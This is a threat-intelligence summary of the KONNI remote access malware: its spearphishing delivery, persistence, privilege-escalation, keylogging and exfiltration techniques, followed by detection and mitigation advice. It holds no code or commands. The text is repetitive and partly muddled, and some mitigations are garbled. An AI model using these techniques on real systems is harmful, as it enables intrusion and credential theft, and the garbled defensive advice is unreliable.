KONNI is a remote access tool that has been used by North Korean cyber actors since at least 2014. It has significant code overlap with the NOKKI malware family and has been linked to several suspected North Korean campaigns that target political organizations in Russia, East Asia, Europe, and the Middle East. There is evidence that KONNI may be linked to APT37.KONNI affects Windows operating systems and has used HTTP POST for C2. It has used PowerShell to download and execute a specific 64-bit version of the malware, and can take screenshots of the victim's machine. It has also duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.KONNI has been delivered via spearphishing campaigns through a malicious Word document. It is heavily obfuscated and includes encrypted configuration files.
KONNI Malware Capabilities
KONNI is a threat actor that may use a number of techniques to avoid detection and escalate privileges, including software packing, virtual machine software protection, and symmetric encryption. KONNI may also transfer tools or files from an external system into a compromised environment, and may attempt to get information about running processes on a system.KONNI may attempt to evade detection and analysis by encrypting or obfuscating files and communications. It may also abuse legitimate applications to execute malicious code, and collect data from the clipboard. Additionally, KONNI may create shortcuts to run programs on system startup, and may send spearphishing emails with malicious attachments.The Konni malware may steal data by exfiltrating it over an existing command and control channel, and may also abuse the Windows command shell for execution. The malware may also bypass UAC mechanisms to elevate process privileges on a system, and may establish persistence by executing malicious content triggered by hijacked references to Component Object Model objects. The Konni malware may also delete files left behind by its actions, and may attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system.KONNI is a malicious software that may be used to gain access to a system and steal data. It may add programs to a startup folder or referencing it with a Registry run key in order to achieve persistence. It may also log user keystrokes in order to capture credentials. Additionally, KONNI may exfiltrate data over an un-encrypted network protocol or to an alternate network location.
- The malware known as KONNI may use application layer protocols associated with web traffic in order to avoid detection and network filtering. Additionally, KONNI may abuse PowerShell commands and scripts for execution in order to perform various actions, such as discovery of information and execution of code. Furthermore, KONNI may attempt to take screen captures of the desktop in order to gather information during its operations.
- The Konni malware may use various methods to evade detection and escalate privileges, including software packing, virtual machine software protection, and symmetric encryption. These methods may be used to conceal command and control traffic and avoid signature-based detection.
- The KONNI malware may transfer tools or files from an external system into a compromised environment. It may also attempt to get information about running processes on a system. KONNI may use this information to determine which systems to infect and what actions to take. Additionally, KONNI may interact with the Windows Registry to hide configuration information or remove information as part of cleanup.
- KONNI may stealing data by exfiltrating it over an existing command and control channel, or by abusing the Windows command shell for execution. Additionally, KONNI may enumerate files and directories or search in specific locations of a host or network share for certain information within a file system.
- KONNI is a malware that may be used to elevate process privileges on a system in order to perform a task under administrator-level permissions. Additionally, KONNI may use obfuscated files or information to hide its tracks, and may also establish persistence by executing malicious content triggered by hijacked references to Component Object Model objects.
- KONNI may collect information about users on a system in order to shape follow-on behaviors, including whether or not to fully infect the target and/or attempt specific actions. Data may be compressed and/or encrypted prior to exfiltration in order to obfuscate it and make exfiltration less conspicuous.
- The KONNI malware may use various techniques to persistence and evade detection, including creating and modifying Windows services, spoofing parent process identifiers, and logging user keystrokes. These activities could be used to gain new access opportunities and intercept credentials.
- KONNI may use several methods to gain persistence on a system, including adding a program to a startup folder or referencing it with a Registry run key. It may also steal data by exfiltrating it over an un-encrypted network protocol. An adversary may rely upon a user opening a malicious file in order to gain execution.
- KONNI may interact with the native OS application programming interface to execute behaviors.
- KONNI may give tasks or services names that are similar or identical to those of legitimate one
KONNI may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control information can be encoded using a standard data encoding system that adheres to existing protocol specifications.
- The article discusses how to mitigate KONNI malware attacks. One way to do this is to analyze network data for unusual data flows. Another way to detect malicious activity is to monitor for screen capture behavior.
- The KONNI malware attack can be mitigated in several ways, including by auditing command-line activity for use of the runas command or similar artifacts, scanning for known software packers or packing artifacts, and using symmetric encryption to decode network traffic and look for malware communications signatures.
- The KONNI malware attack can be mitigated by monitoring for file creation and transfer, system and network discovery, and modifications to the registry. These changes could include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.
- The Konni malware attack can be mitigated by collecting file hashes, monitoring file activity, and monitoring for events associated with scripting execution. These measures can help to detect and prevent the malware from causing damage to a system.
- The Konni malware attack can be mitigated by using process monitoring to monitor the execution and arguments of rundll32.exe. This will allow you to compare recent invocations of rundll32.exe with prior history and identify any potential anomalies. Additionally, network intrusion detection systems and email gateways can be used to detect and block any spearphishing attempts with malicious attachments in transit.
- The KONNI malware attack can be mitigated by detecting the file obfuscation process, or by monitoring processes and command-line arguments for actions that could lead to data collection. Additionally, data may be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
- The KONNI malware can be mitigated by analyzing network data for unusual patterns, restricting the use of scripts on systems, and monitoring system and network activity for suspicious behavior. Taking these steps can help to prevent or at least detect attacks using this malware.
- The KONNI malware can be mitigated by detecting and monitoring process API calls and loaded DLLs for unusual behavior, as well as by collecting scripts and system utilities for analysis. Additionally, COM hijacking can be detected by searching for replaced Registry references and anomalous Registry entries.
- The KONNI malware attack can be mitigated in several ways. First, it is important to monitor for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove. Additionally, system and network discovery techniques should be used to detect data and events that could lead to other malicious activities. Finally, archival software and archived files can be detected through process monitoring and monitoring for command-line arguments for known archival utilities.
- The Konni malware attack can be mitigated by monitoring processes and command-line arguments for actions that could create or modify services, collecting service utility execution and service binary path arguments used for analysis, and looking for inconsistencies between the various fields that store PPID information. Keyloggers may take many forms, but common indicators of keylogging activity include changes to the Registry and file system, driver installs, and API calls such as `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.
- The Konni malware can be used to gain initial access to a system and then persist on that system. It can be mitigated by monitoring the system for changes, such as new programs or changes to the run keys in the Registry. Network data should also be monitored for suspicious activity.
- The KONNI malware attack can be mitigated by identifying web browser files that contain credentials, monitoring file read events of web browser files, and monitoring process execution logs. System and network discovery techniques can help to identify potential malicious activity. API monitoring can also be used to help identify malicious behavior.